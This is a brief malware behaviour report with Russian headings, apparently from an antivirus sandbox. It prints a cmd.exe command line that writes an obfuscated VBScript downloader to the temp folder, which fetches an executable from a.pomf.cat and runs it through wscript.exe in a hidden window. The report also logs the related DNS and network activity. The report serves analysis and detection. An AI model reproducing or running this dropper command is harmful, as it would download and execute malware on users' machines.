Техническая информация
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO C8g= "http://a.pomf.cat/pjjsag.exe">>N5o.VBS &@ECHO S9v = Z3i("V^i>UhU")>>N5o.VBS &@ECHO Set B7g = CreateObject(Z3i("]ch]\B>h]\Xdd`"))>>N5o.VBS &@ECHO B7g.Open Z3i("WUd"), ...
- %TEMP%\n5o.vbs
- %TEMP%\n5o.vbs
- 'a.##mf.cat':80
- http://a.##mf.cat/pjjsag.exe
- DNS ASK a.##mf.cat
- '<SYSTEM32>\wscript.exe' "%TEMP%\N5o.VBS"
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO C8g= "http://a.pomf.cat/pjjsag.exe">>N5o.VBS &@ECHO S9v = Z3i("V^i>UhU")>>N5o.VBS &@ECHO Set B7g = CreateObject(Z3i("]ch]\B>h]\Xdd`"))>>N5o.VBS &@ECHO B7g.Open Z3i("WUd"), ...' (со скрытым окном)
- '<SYSTEM32>\timeout.exe' 13